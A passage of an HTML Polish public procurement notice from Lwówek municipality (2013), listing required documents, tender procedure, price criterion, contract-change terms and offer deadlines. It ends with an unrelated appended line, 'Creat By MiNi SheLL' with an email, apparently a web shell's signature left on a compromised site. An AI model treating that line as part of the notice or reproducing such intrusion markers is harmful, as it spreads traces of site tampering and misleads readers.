<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: tak

Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 
Zmiana terminu realizacji przedmiotu umowy. 
1. Zmiany terminu wykonania zamówienia w następujących przypadkach:                                                             
1) z przyczyn, za które Zamawiający nie ponosi odpowiedzialności, zaszła konieczność zmiany terminu wykonania zamówienia publicznego (niniejszej umowy) - w takim przypadku Wykonawca zobowiązuje się zrealizować przedmiot zamówienia w innym, wskazanym przez Zamawiającego terminie - z uwzględnieniem jednak możliwości technicznych Wykonawcy.
2) uległa zmianie ustawowa stawka podatku VAT lub inna należność publicznoprawna bądź inny regulowany prawem składnik cenotwórczy wpływający na zobowiązanie pieniężne Zamawiającego -w takim przypadku Wykonawca zobowiązuje się zrealizować przedmiot zamówienia za inną, odpowiednio wyższą bądź niższą cenę niż wskazana w jego Ofercie.
2. W sytuacji, kiedy  wartość najkorzystniejszej oferty wybranej do realizacji zamówienia będzie wyższa, a niżeli wartość środków zabezpieczonych w budżecie Gminy Lwówek w 2013r. na przedmiotowe zamówienie, Zamawiający przewiduje możliwość rezygnacji z części przedmiotu zamówienia (rezygnacji z niektórych wyrobów z wyceny ofertowej). 
W przypadku rezygnacji z części przedmiotu zamówienia przez Zamawiającego, wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone o ilość dostaw niewykonanych na bazie kosztowej wskazanej w załącznikach do siwz - wycenie ofertowej nr 8, nr 9, nr 10, nr 11, nr 12, oraz w zbiorczej wycenie ofertowej - załącznik nr 13, obejmujący inne koszty niezbędne do realizacji zamówienia nie wyszczególnione w poszczególnych załącznikach (od nr 8 do nr 12).
Ewentualne wyłączenia niektórych dostaw, zostaną zrealizowane po wyborze najkorzystniejszej oferty, przed podpisaniem umowy z Wykonawcą dostawy, na podstawie protokółu niezbędnej konieczności w uzgodnieniu z Wykonawcą dostawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lwowek.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiajacego, w Urzędzie Miasta i Gminy w Lwówku, ul. Ratuszowa 2, 64-310 Lwówek, pokój nr 20, bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego -                     Urząd Miasta i Gminy w Lwówku, ul. Ratuszowa 2, pokój nr 5 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com